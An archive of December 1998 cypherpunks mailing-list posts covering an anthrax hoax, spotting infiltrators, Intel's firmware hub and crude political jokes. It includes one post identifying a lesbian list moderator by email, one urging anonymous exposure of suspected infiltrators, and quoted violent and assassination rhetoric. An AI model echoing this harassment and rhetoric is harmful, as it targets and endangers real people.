 7. SLOT MATHEMATICS
 8. MACHINE CYCLES
 9. THE SLOT FLOOR
10. MECHANICAL PROBLEMS
11. RESERVING THE  MACHINE
12. SYSTEMS
13. ALL ABOUT JACKPOTS
14. CHOOSING YOUR SLOT
15. PULLING THE HANDLE
16. AMATEURS AND EXPERTS
17. AND MUCH, MUCH MORE!


ACT NOW!  30 DAY MONEY-BACK GUARANTEE


"For over 20 years I've played the slots as a lark. After reading your book I
play for one reason- TO WIN! And that's just what I'm doing. Who said the
bandits can't be beaten!!"

J. Bresnahan
San Diego, CA


IT'S  EASY TO ORDER!  Simply Print Out This Form, Fill Out & Mail Today. 


YES!  I want To Beat the One Arm Bandit please RUSH!


Enclosed is my: Check _____  Cash ____ Money Order ____  for $10.00

(Outside of U.S.A. add $5.00 for shipping & handling)


Name: _________________________________

Address: _______________________________                                      

City _____________    State_______   Zip_________


E-mail Address: _____________________________


Phone # _________________


MAIL TODAY:

GLOBAL DISTRIBUTION		
P.O BOX 7247
GARDEN CITY, NY 11795  U.S.A.










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@clueserver.org>
Date: Sun, 20 Dec 1998 04:06:50 +0800
To: riburr@shentel.net
Subject: Re: Preemptive, proactivism
In-Reply-To: <367B3EAA.2F870154@shentel.net>
Message-ID: <3.0.5.32.19981219114004.03cb9c20@clueserver.org>
MIME-Version: 1.0
Content-Type: text/plain



At 12:50 AM 12/19/98 -0500, Frederick Burroughs wrote:

>What's scary is that someone could disperse a toxin unwittingly. "Do you
>know where your shoes are 24 hours a day?" an agent said. "This is
>something we have to think about, but short of an actual scare, I don't
>think we'll be asking you to take off your shoes. Not just yet."

"Shoes for Terrorists! Shoes for the dead! Shoes for Terrorists!"

I think they need to investigate the influence of Firesign Theatre over our
security agencies.

---
|      Bill Clinton - Bringing back the Sixties one Nixon at a time!     |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|                                                  | behind the keyboard.|
|         http://www.ctrl-alt-del.com/~alan/       |alan@ctrl-alt-del.com|




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William J.Hartwell" <billh@ibag.com>
Date: Sun, 20 Dec 1998 05:12:11 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: MS and Y2K
Message-ID: <3.0.5.32.19981219134839.007c8780@mail.xroads.com>
MIME-Version: 1.0
Content-Type: text/plain





Redmond, WA - Microsoft announced today that the official release date for
the new operating system "Windows 2000" will be delayed until the second
quarter of 1901.

--
					William J. Hartwell
					   (602)987-8436
					  Queencreek, Az.

billh@ibag.com			billh@interdem.com		billh@hartwell.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "X" <xasper8d@lobo.net>
Date: Sun, 20 Dec 1998 05:38:45 +0800
To: "William J.Hartwell" <cypherpunks@EINSTEIN.ssz.com>
Subject: RE: MS and Y2K
In-Reply-To: <3.0.5.32.19981219134839.007c8780@mail.xroads.com>
Message-ID: <000601be2b92$6d295f00$6a8a83d0@ibm>
MIME-Version: 1.0
Content-Type: text/plain



Damn.  I needed that software.  ;^)

~> -----Original Message-----
~> From: owner-cypherpunks@minder.net
~> [mailto:owner-cypherpunks@minder.net]On Behalf Of William J.Hartwell
~> Sent: Saturday, December 19, 1998 1:49 PM
~> To: cypherpunks@einstein.ssz.com
~> Subject: MS and Y2K
~> 
~> 
~> 
~> 
~> Redmond, WA - Microsoft announced today that the official 
~> release date for
~> the new operating system "Windows 2000" will be delayed until the second
~> quarter of 1901.
~> 
~> --
~> 					William J. Hartwell
~> 					   (602)987-8436
~> 					  Queencreek, Az.
~> 
~> billh@ibag.com			billh@interdem.com		
~> billh@hartwell.net
~> 
~> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sun, 20 Dec 1998 06:49:51 +0800
To: "Erich Moechel" <erich-moechel@quintessenz.at>
Subject: Re: international free crypto campaign
In-Reply-To: <v04020a44b2a002ece47e@[139.167.130.248]>
Message-ID: <3.0.5.32.19981219141405.009104e0@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



They're _all_ animated blinking things.  Ugly.
Some of them have good content, but there need to be
static non-animated regular GIFs.
Aside from the aesthetic issues, there are probably still browsers
that don't support them, and certainly anything printed on
dead trees or other static media won't display the animation.


>We are in the midst of developing logos 4 the global campaign
>proposed as followup 2 the Wassenaar decision.
>The logos are here:
>
> http://www.quintessenz.at/freecrypto.html
>
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Sun, 20 Dec 1998 06:37:58 +0800
To: Frederick Burroughs <cypherpunks@ns.minder.net>
Subject: Re: Preemptive, proactivism
In-Reply-To: <367B3EAA.2F870154@shentel.net>
Message-ID: <199812192205.OAA13533@smtp.well.com>
MIME-Version: 1.0
Content-Type: text/plain



At 12:50 AM 12-19-98 -0500, Frederick Burroughs wrote:
>The recent cacophony of events in Washington D.C. may soon take on an
>aura of japanese surrealism. The secret service is weighing the
>necessity of having White House visitors and press conference attendees
>remove their shoes. The ability to disperse anthrax toxin from the

April 1 is coming early, I see.

I go to White House events and other meetings inside the WH complex
regularly, and believe me, there are other options the SS has besides
asking reporters to go shoeless.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Salvatore Denaro" <sal@panix.com>
Date: Sun, 20 Dec 1998 07:05:10 +0800
To: "Frederick Burroughs" <cypherpunks@toad.com>
Subject: RE: FCPUNX:Clinton Attacks Iraq
In-Reply-To: <199812190315.TAA25505@anon7b.sunder.net>
Message-ID: <008f01be2b9f$1dac7b30$0201010a@aurora.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



>  From     : Frederick Burroughs <riburr@shentel.net>
>  Subj     : Clinton Attacks Iraq
>  Date     : Wed, 16 Dec 1998 21:13:10 -0500
> Eric Cordian wrote:
> > Looks like Bubba has launched a massive strike on Iraq to draw attention
> > from his cocksucking problems.
> 
> No, I blame his irritability on lack of nookie. Unable to get his 
> his willy
> slick of late, it's not surprising he needs to kick the dog, or lob some
> ordinance into the backyard of the middle eastern assholes nextdoor. Maybe
> if he gets drunk enough he'll take some pot shots... Yeehaa!

Caught between Iraq and a hard-one?

Perhaps would should allow our elected officials to keep concubines. After all, no man is going to end the world on a crappy Monday morning if there a chance of getting some that night. I'm willing to bet that the money used to launch one cruise missile could support keeping a group of well funded presidential concubines around for the duration of his eight year presidency. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Missouri FreeNet Administration <measl@mfn.org>
Date: Sun, 20 Dec 1998 08:15:46 +0800
To: Salvatore Denaro <sal@panix.com>
Subject: RE: FCPUNX:Clinton Attacks Iraq
In-Reply-To: <008f01be2b9f$1dac7b30$0201010a@aurora.panix.com>
Message-ID: <Pine.BSF.3.96.981219174533.3596B-100000@greeves.mfn.org>
MIME-Version: 1.0
Content-Type: text/plain




::I'm willing to bet that the money used to launch one cruise missile
::could support keeping a group of well funded presidential concubines
::around for the duration of his eight year presidency. 

Hey, we're not talking about JFK here ya'know... A cruise missile is
only about 800K$ (sans exotic warhead) apiece: hardly enough to keep
as many concubines as Klinton would likely need...

Maybe RonCo can make some kind of Presidential Satisfier instead of 
all those slicing/dicing machines they sell this time of year???  ;-0

Yours, 
J.A. Terranson
sysadmin@mfn.org

--
If Governments really want us to behave like civilized human beings, they
should give serious consideration towards setting a better example:
Ruling by force, rather than consensus; the unrestrained application of
unjust laws (which the victim-populations were never allowed input on in
the first place); the State policy of justice only for the rich and 
elected; the intentional abuse and occassionally destruction of entire
populations merely to distract an already apathetic and numb electorate...
This type of demogoguery must surely wipe out the fascist United States
as surely as it wiped out the fascist Union of Soviet Socialist Republics.

The views expressed here are mine, and NOT those of my employers,
associates, or others.  Besides, if it *were* the opinion of all of
those people, I doubt there would be a problem to bitch about in the
first place...
--------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sun, 20 Dec 1998 17:41:56 +0800
To: cypherpunks@cyberpass.net
Subject: Re: How to Spot a Government Infiltrator
In-Reply-To: <c3118f5d71c691af6d2c0a19397e1b4c@anonymous>
Message-ID: <3.0.5.32.19981219204957.008297e0@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 05:57 PM 12/18/98 -0800, some allegedly anonymous dissipator
forwarded an allegedly militia-movement article on
>	How to Spot a Government Infiltrator 
and why you should be afraid, very afraid.

Back in the 60s-90s, the Peace Movement dealt with this
kind of problem as well, with the FBI and others trying
to interfere with their interference with government.
And the Commies and Labor Movement before them.
Now it's the right wing's turn, as well as
libertarians, and crypto-privacy advocates, and
financial-privacy advocates, and chemical-privacy enthusiasts.

> moles
Not a problem here - anybody can subscribe to the list,
and the physical meetings are open.  We even had a guy from
Colorado who said his name was "Lawrence" who hung around
for half a meeting and disappeared quietly before
any public notice was taken of his probable identity :-)

> dissipators
> 	Given that the people who are attracted to the constitutionalist 
>	militia movement usually tend to be strong willed and opinionated
>	people to begin with, such an agent may find that his task is 
>	somewhat easier than it might be if he were working with other groups. 

Certainly we've got no problem with that here :-)
Ok, it has happened, and the tools that people built dealing
with Detweiler(s) and spammers have been the beginnings of things
we'd need in the future anyway.

> agent provocateur
>     (2) Wants to get everybody else to make bombs.

In this case, it's "wants to get everybody to export crypto and get busted",
but the good guys do that too.

I was once at a roughly 10-person protest against the previous day's 
workers-without-identity-papers bust by the local La Migra, cops, and press,
and one of the folks from "Refuse and Resist" who showed up kept saying we 
should go out and bust the sheriff's departments' heads.
Maybe he was just a bad peacenik as opposed to a provocateur.

>     (5) No obvious means of support, especially if they have 
>	lots of money to throw around.

The classic way that Commies recognized infiltrators during the
Red Scare days was that they were the ones who paid their dues :-)

In the cypherpunk business, nobody's unemployed, they're just
computer consultants, or freelance journalists, or professional investors, 
or retired successful entrepreneurs, or financial privacy consultants
who attend money laundering conventions, so this one's no help;
might as well suspect folks who are long-term employees of
telecommunications monopolies or defense contractors.....



				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sun, 20 Dec 1998 17:48:47 +0800
To: cypherpunks@cyberpass.net
Subject: Re: CyberScam
In-Reply-To: <3.0.5.32.19981023111259.007c9100@max-web.com>
Message-ID: <3.0.5.32.19981219212836.008297e0@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 12:43 PM 12/16/98 -0800, Tim May wrote
>I wanted to see what other nonsense this nitwit has written, and found this:
>At 10:12 AM -0800 10/23/98, Kevlar wrote:
>>My bad. You were serious. But still...
>
>My bad _what_? The fragment "My bad" is nonsense.

Don't be an old fogey, Tim :-)  I've heard the phrase from
young and otherwise at least semi-educated people.
Like, language evolves, y'know -- it's far out that the
younger generation is participating in the literary process, man.
Donaldson's law suggests that Sturgeon was an optimist,
and one hopes that this phrase will soon be recognized for
its place in the 90+% and fall out of fashion,
rather than spurring a major industry like the annoying
"Successories" wall-plaques with MBA/salesdroid jargon on them.
At least its meaning is generally clear in context,
unlike some of the popular post-modernist drivel,
and its artificial stupidity is no more artificial than 
using "mea culpa" in modern English.

>>Mozilla (NS), IE, and many other less well known (but certianly as popular)
>>WEB browsers have encryption built right into them, so you can do things
>>"Securely". Nobody uses their real name on the internet, unless it's for
>>buisness,
>Nonsense. Many of us use our "real names" on the Internet, right here on
>this non-business list. In fact, real names outnumber nyms by probably
>10-1. Ditto for most of the Usenet and most mailing lists. Chat rooms may
>be a different story...I wouldn't know about them.

Similarly, IRC and CuSeeMe appear to be nym-oriented rather than
real-sounding-name-oriented.  AOL isn't exactly the internet,
but it tends to use screen names.  I'm not sure about ICQ, but 
I think it's also nym-oriented, and it's got 10 million or so users.

>>Naturally this is in compareison to the internet's predacessor (Not
>>ARPAnet, that was a government project. BBS's came first)
>><grumblegrumbledamninternetstoleallthecallersfrommyboardafter5yearsofrunning
>>itgrumble>, which were mostly free to anyone who came and wanted to dl/ul a
>>file or post in the message base. And usally if it wasn't open you could
>>apply for access.
>
>No, BBBs (not "BBS's") did _not_ come first. I had an ARPANet account in
>1973 or so, long before any meaningful BBSs were available. (And the
>ARPANet goes back to 1967-8 or so.)

The Better Business Bureau has been around much longer than that?

Ward Christiansen, inventor of XModem, also credits himself with
inventing the "first" BBS in 1978.  Perhaps it was the first for
cheap PCs, but I'd already been using the Plato Notesfile system 
for about 3 years by then, which was really just a better BBS 
running on a much more expensive computer and terminals
(plus it had multiplayer interactive Space War :-)
and it wasn't too new when I started using it.

And ARPAnet mailing lists had been around for quite a while before 78,
as well as mailing lists in the BITnet/CSnet/Phonenet environments.
Usenet emerged around 1981, and for the first few years was
primarily running on dialup UUCP as well as higher-speed LANs
of various sorts.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Sun, 20 Dec 1998 14:03:21 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Anthrax Theatre
In-Reply-To: <199812200446.WAA16015@wire.insync.net>
Message-ID: <v03130323b2a23e68e2a4@[209.66.101.206]>
MIME-Version: 1.0
Content-Type: text/plain



At 8:46 PM -0800 12/19/98, Eric Cordian wrote:
>Force hundreds of people to be imprisoned against their will, and
>injected with potentially lethal antibiotics, with one simple 25 cent
>phone call.
>
>-----
>
>LOS ANGELES (AP) -- Ninety-one people were held for almost eight hours
>as a health precaution after an anonymous threat claimed anthrax had
>been released into the air ducts of a federal building.
>
>The people were given antibiotics and special suits to wear over their
>clothes Friday before preliminary tests showed none of them had been
>infected with the potentially deadly bacterium.
>
>Authorities held the people, most of them U.S. Bankruptcy Court staff
>members, as firefighters and FBI investigators tested the ventilation
>system for anthrax spores. Those tests also came up empty, said
>Jonathan Fielding, spokesman for the Los Angeles County Health
>Department.
>
>The FBI would not release details of how the threat was delivered.


Which Cypherpunks live in or near L.A. and are involved in some way with
the Bankruptcy Court?

--Tim May

We would go to their homes, and we'd kill their wives and
their children. We would kill their families
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Sun, 20 Dec 1998 14:23:32 +0800
To: cypherpunks@einstein.ssz.com
Subject: Re: Anthrax Theatre
In-Reply-To: <199812200517.GAA00108@replay.com>
Message-ID: <v03130324b2a23f932946@[209.66.101.206]>
MIME-Version: 1.0
Content-Type: text/plain



At 9:17 PM -0800 12/19/98, Anonymous wrote:

>The FBI is in between a rock and a hard-on here.
>
>If anthrax spores really had been released into those air ducts, it could
>potentially infect anyone in the building. They can't very well let these
>people walk out when they might be carriers of antrax. That's the power of
>bioweapons: Infect a bunch of people and they do the work of spreading it
>for you.

This is not how anthrax spreads. Communicability between humans is nearly
nonexistent.

--Tim May

We would go to their homes, and we'd kill their wives and
their children. We would kill their families
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Sun, 20 Dec 1998 13:09:46 +0800
To: cypherpunks@cyberpass.net
Subject: Anthrax Theatre
Message-ID: <199812200446.WAA16015@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



Force hundreds of people to be imprisoned against their will, and
injected with potentially lethal antibiotics, with one simple 25 cent
phone call.
 
-----
 
LOS ANGELES (AP) -- Ninety-one people were held for almost eight hours
as a health precaution after an anonymous threat claimed anthrax had
been released into the air ducts of a federal building.
 
The people were given antibiotics and special suits to wear over their
clothes Friday before preliminary tests showed none of them had been
infected with the potentially deadly bacterium.
 
Authorities held the people, most of them U.S. Bankruptcy Court staff
members, as firefighters and FBI investigators tested the ventilation
system for anthrax spores. Those tests also came up empty, said
Jonathan Fielding, spokesman for the Los Angeles County Health
Department.
 
The FBI would not release details of how the threat was delivered.

-- 
Eric Michael Cordian 0+
O:.T:.O:. Mathematical Munitions Division
"Do What Thou Wilt Shall Be The Whole Of The Law"
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Briggs <ian@deepwell.com>
Date: Sun, 20 Dec 1998 15:30:22 +0800
To: cypherpunks@toad.com
Subject: Re: Open Letter To William Klinton (fwd)
In-Reply-To: <Pine.BSF.3.96.981216163614.1753C-100000@support.noc.mfn.org>
Message-ID: <4.1.19981219230139.0204c840@deepwell.com>
MIME-Version: 1.0
Content-Type: text/plain



>	Impeachment is no longer enough: only assasination could hope to
>bring Justice to the world at this point.

Great.  Expect a Secret Service visit from this e-mail
Im sooooo glad you thought you should share this with the rest of the list.

Can't wait to say "got mine" like all the rest of the cool people...



Ian



Welcome to 1984
as with all goverment projects, its a bit late 
and slightly overbudget
	-Ian Briggs.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sun, 20 Dec 1998 07:22:50 +0800
To: cypherpunks@toad.com
Subject: Iwhack
Message-ID: <199812192253.XAA04374@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



At 07:50 PM 12/17/98 -0500, Frederick Burroughs wrote:
>Specifically, positioning data from GPS receivers used by weapons
inspectors at
>inspection sites in Iraq provided precise targeting coordinates for US cruise
>missiles. Information from UN inspectors was also used to prioritize targets
>into several categories, including: High threat defensive sites such as
>antiaircraft missile and radar facilities, medium threat command and
>communications sites, and low threat power and manufacturing plants. GPS data
>was essential for targeting high threat sites located near residential areas.

It is not always entirely propoganda that embassy people, peace corps types, 
businessmen, etc. are spies.








  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sun, 20 Dec 1998 07:24:13 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199812192258.XAA04791@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



::
Subject: infiltration

At 05:57 PM 12/18/98 -0800, Pallas Anonymous Remailer wrote:
>How to Spot a Government Infiltrator 
>
>                              by Mike Johnson
>
>Arguably the best way to deal with people who meet criteria 1-10 is simply
to invite them to leave
>the unit. As Starr and McCranie found out, trying to turn them in will do
no good at all, so the next
>best bet is to try to get them to leave. 

You may also want to post their faces anonymously on relevent lists.
Phrase it to avoid liability, or not.  False alarms are regrettably
a consequence of security.



Ms Winchester










  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sun, 20 Dec 1998 12:22:35 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: Intel security hub
Message-ID: <199812200355.EAA26562@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



> I wonder what government sponsored back doors they plan to include...
> 
> http://www.techweb.com/wire/story/TWB19981214S0008

This has been mentioned before. Only suggested response so far is to fight
tooth and nail to ensure that hub-dependent programs can work transparently
with a software fill-in. Otherwise you could potentially need to break a
tamper-resistant chip, patch the software (fortify^2...), or pull off some such
superhuman feat.

(By the way, the address for letters to the editors of Mobile Computing and
Communications, in case you want to respond to the articles mentioned, is
<letters@mobilecomputing.com>) 

More redundant reiterations of senseless nonsense:

I'm not so confident it'd be backdoored, but if it's closed-source (not
unlikely) that is, for obvious reasons, bad. Even if not, it will, with
probability just barely <1, result in Intel as a major CA. I don't think the
hub'd be backdoored because it'd be a risky investment for anybody to backdoor
it; although I'm not sure the hub'd be closed-source, anything trivially and
undetectably compromised is about as bad; Intel'd use the hub to become a CA
just because it makes business sense.

> 
>                 Intel's Security Plans Worry PC Builders
> 
>                 (12/14/98, 3:49 p.m. ET)
>                 By Rick Boyd-Merritt and Mark Carroll, EE Times 
> 
>                 Intel will add new security and software functions to future
>                 chip sets in a move that will boost the profile of its
>                 upcoming Katmai processors as key silicon for multimedia
>                 and e-commerce. But the plan is raising concerns among
>                 software, semiconductor and systems companies that fear
>                 the processor giant could wind up encroaching on their
>                 markets, extending its own reach deeper into the PC
>                 architecture.
> 
>                 Intel's plans center around a so-called firmware hub,
>                 essentially a flash memory with key BIOS functions,
>                 which will be part of its Camino, Carmel, and Whitney chip
>                 sets. Those products will accompany next year's Katmai
>                 processors and are expected to be used in the Merced line,
>                 too. 
> 
>                 "This is an example of Intel taking in one more piece of the
>                 PC architecture," said a senior R&D manager with a major
>                 PC company who asked not to be named. 
> 
>                 Intel would not comment on its unannounced products.
>                 However, the key features of the chip are beginning to
>                 come to light based on reports from multiple sources. The
>                 firmware hub is "basically a flash chip with locks on its
>                 read and write capabilities that can be opened using a
>                 cryptographic protocol," said another source briefed by
>                 Intel. 
> 
>                 Hardware security functions include a cryptographic
>                 engine to authenticate digital certificates Intel or a third
>                 party could load in. The chip could hold multiple
>                 certificates, each with permission to grant specific
>                 features, such as to permit an operating system or an
>                 MPEG player to run. They would also ensure a software
>                 program licensed to one user was not copied and run on
>                 another machine, a common practice. In addition, the
>                 certificates will act like unique serial numbers, identifying a
>                 given machine in any Internet or corporate network
>                 transaction, sources said. 
> 
>                 The hub may also include a random-number generator to
>                 create public keys for encryption and help enable
>                 encrypted transmissions between PCs. That would provide
>                 security for e-commerce and software downloads,
>                 possibly including software modules for host-based
>                 modems, MPEG players, or audio codecs that are
>                 housed in the firmware hub and run on the CPU. 
> 
>                 Another feature sources have mentioned is physical
>                 security, linking sensors to the hub so it may report
>                 problems to a central network administrator if the case is
>                 tampered with or peripherals are removed. 
> 
>                 Even though the firmware -- and the chip sets it is part of
>                 -- are not due for production until at least mid-1999,
>                 samples have been available in Taiwan for some time. 
> 
>                 "We have had samples of the firmware hub for a while,"
>                 said a project manager at First International Computer, in
>                 Taiwan. "We really haven't done too much with it yet. It is
>                 still not quite clear when it will be used and what its 
>                 full functions will be." 
> 
>                 The hub chip is designed to incorporate new features into
>                 the PC upon start-up, the manager said, not to replace the
>                 standard BIOS, the key software that controls system I/O
>                   peripherals software. 
> 
>                 "After a PC is turned on, the firmware hub will be
>                 accessed and then the regular BIOS," said a BIOS
>                 engineer with another Taiwanese company. "The hub will
>                 affect the standard BIOS architecture, but it certainly
>                 won't replace it. That's not its purpose." 
> 
>                 Yet the prospect of a possible Intel incursion into BIOS is
>                 giving some industry observers the willies. Adding to their
>                 concern is the fact that Intel has not provided technical
>                 details about its implementation yet. One analyst said the
>                 hub will act as a BIOS registry, a place from which
>                 software emulation and upgrades can be controlled. 
> 
>                 Sources close to Intel suggested the Santa Clara, Calif.,
>                 company would be leery of entering a new PC-related
>                 market while under the shadow of a Federal Trade
>                 Commission investigation. The company's motive is simply
>                 to bring new features to the PC, enhancing sales for
>                 corporate and consumer users, these sources said. 
> 
>                 Still, "If Intel controls what and how stuff gets put in the
>                 BIOS, that's really significant," said one analyst.
>                 "That's a wonderful control choke point."
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sun, 20 Dec 1998 13:34:38 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: Anthrax Theatre
Message-ID: <199812200517.GAA00108@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



>Force hundreds of people to be imprisoned against their will, and
>injected with potentially lethal antibiotics, with one simple 25 cent
>phone call.
>
>-----
>
>LOS ANGELES (AP) -- Ninety-one people were held for almost eight hours
>as a health precaution after an anonymous threat claimed anthrax had
>been released into the air ducts of a federal building.
>
>The people were given antibiotics and special suits to wear over their
>clothes Friday before preliminary tests showed none of them had been
>infected with the potentially deadly bacterium.
>
>Authorities held the people, most of them U.S. Bankruptcy Court staff
>members, as firefighters and FBI investigators tested the ventilation
>system for anthrax spores. Those tests also came up empty, said
>Jonathan Fielding, spokesman for the Los Angeles County Health
>Department.
>
>The FBI would not release details of how the threat was delivered.

The FBI is in between a rock and a hard-on here.

If anthrax spores really had been released into those air ducts, it could
potentially infect anyone in the building. They can't very well let these
people walk out when they might be carriers of antrax. That's the power of
bioweapons: Infect a bunch of people and they do the work of spreading it
for you.

>From a medical standpoint, it may be better to inject them with antibiotics
before the test results are back, in an attempt to increase chances of
survival. I can also understand the containment suits.

The fact that it can be done with a 25 cent phone call is funny. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sun, 20 Dec 1998 14:52:01 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: Re: Anthrax Theatre
Message-ID: <199812200637.HAA04958@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



>At 9:17 PM -0800 12/19/98, Anonymous wrote:
>
>>The FBI is in between a rock and a hard-on here.
>>
>>If anthrax spores really had been released into those air ducts, it could
>>potentially infect anyone in the building. They can't very well let these
>>people walk out when they might be carriers of antrax. That's the power of
>>bioweapons: Infect a bunch of people and they do the work of spreading it
>>for you.
>
>This is not how anthrax spreads. Communicability between humans is nearly
>nonexistent.

If this is true, we've caught the media in yet another lie. The media likes
to paint the picture that anthrax can be released in an airport and spread
to all corners of the country in a matter of hours.

Typical of the media. Shame on me for accessing anything they've shoved down
my throat. :)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sun, 20 Dec 1998 20:29:59 +0800
To: cypherpunks@toad.com
Subject: The "Married Lesbian Underground" (was: Re: Huffington a Fag)
Message-ID: <199812201141.MAA21834@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



jackel@melbpc.org.au (jackel@melbpc.org.au) wrote:

> >In fact, this is common enough that there are several "Married
> >Lesbian" discussion boards, IRC chat channels, and private mailing
> >lists where women involved in this deception swap notes, and plan
> >their strategy.
> 
> I too have noted this scenario, of women leaving their husbands,
> getting the money and children, then coming out.  I have seen parts of
> an English (UK) book for lesbians advocating precisely that.
> 
> Re the net forums, if you have further information/locations, etc.
> would you please send it to me at the above email address or via the
> alt.mens-rights newsgroup - even if they are just pointers in the
> right direction.
> 
> Thank you very much.

One of them is the "Married But Lesbian" (MarBLes) mailing list
moderated by Anna Holmes <fogbow@sprynet.com> and hosted on the
queernet.org server.  This one is so ultra-paranoid that potential
subscribers are required to submit biographic information to the
moderator and undergo a screening "interview" of some sort prior to
being admitted to the list.  You can read more info on this lesbian
networking tool at this URL at lesbian.org:

  http://www.lesbian.org/lesbian-lists/marbles.html

The idea of using men as "a sperm bank with a checkbook" is really
insidious, but by the time many of the victims of this deception
find out they've been deceived and used, it's too late.  The above
URL, BTW, says that the list has a panel of six formerly married
lesbians for "support", which seems to be a euphemism for coaching.
Since marriage is a civil contract I wonder if such willful
"interference with the performance of a contract" has ever been
redressed in court.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HyperReal-Anon <nobody@sind.hyperreal.art.pl>
Date: Sun, 20 Dec 1998 22:38:28 +0800
To: cypherpunks@cyberpass.net
Subject: No Subject
Message-ID: <3e797bb14d3337e2344cd4ff7c0f6b09@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



>    This has not been lost on those who battle right-wing terror. Early
>    next year, the FBI will launch a nationwide assessment of the threat
>    of domestic terrorism on and around Jan. 1, 2000. "I worry that every
>    day something could happen somewhere," Robert Blitzer, head of the
>    FBIs domestic terrorism unit, told the Los Angeles Times recently (see
>    interview also in this issue).
> 
>    "The odds are that something will happen."
> 

The odds are that *something* will happen, if only because they
finally decide to go and burn Tim May out.

#!/usr/local/bin/perl -0777-- -export-a-crypto-system-sig -RC4-3-lines-PERL
@k=unpack('C*',pack('H*',shift));for(@t=@s=0..255){$y=($k[$_%@k]+$s[$x=$_
]+$y)%256;&S}$x=$y=0;for(unpack('C*',<>)){$x++;$y=($s[$x%=256]+$y)%256;
&S;print pack(C,$_^=$s[($s[$x]+$s[$y])%256])}sub S{@s[$x,$y]=@s[$y,$x]}





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rivers@twistedtunes.com (Bob Rivers)
Date: Fri, 25 Dec 1998 10:27:22 +0800
To: <cypherpunks@cyberpass.net>
Subject: It's Christmas Time
Message-ID: <0299e13180019c8COSWEB2@twistedtunes.com>
MIME-Version: 1.0
Content-Type: text/plain



Hi Twisted Tunes fans!

Just a short note to let you know there are brand new Twisted Tunes in the
Jukebox at http://www.twistedtunes.com  We are stepping up our production
schedule for '99, so we'll let you know as new songs are added.

If you want to give someone that TWISTED CHRISTMAS gift, our online store
is
stocked with all titles and we ship daily. Go to
http://www.twistedtunes.com/order to pick up a cool stocking stuffer.

As always, thanks for your support...

Bob Rivers

PS. This is really me. I wrote this e-mail. Not a form letter. Honest.
What
do I got to do to prove it to you?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rivers@twistedtunes.com (Bob Rivers)
Date: Fri, 25 Dec 1998 10:28:13 +0800
To: <cypherpunks@cyberpass.net>
Subject: It's Christmas Time
